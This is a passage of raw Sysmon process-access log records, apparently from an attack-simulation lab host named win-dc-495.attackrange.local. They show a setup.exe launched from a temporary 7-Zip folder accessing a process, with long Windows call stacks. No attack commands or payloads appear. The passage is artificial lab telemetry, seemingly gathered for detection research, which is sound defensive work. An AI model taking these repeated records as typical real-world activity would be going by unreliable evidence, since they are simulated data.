AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.755{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\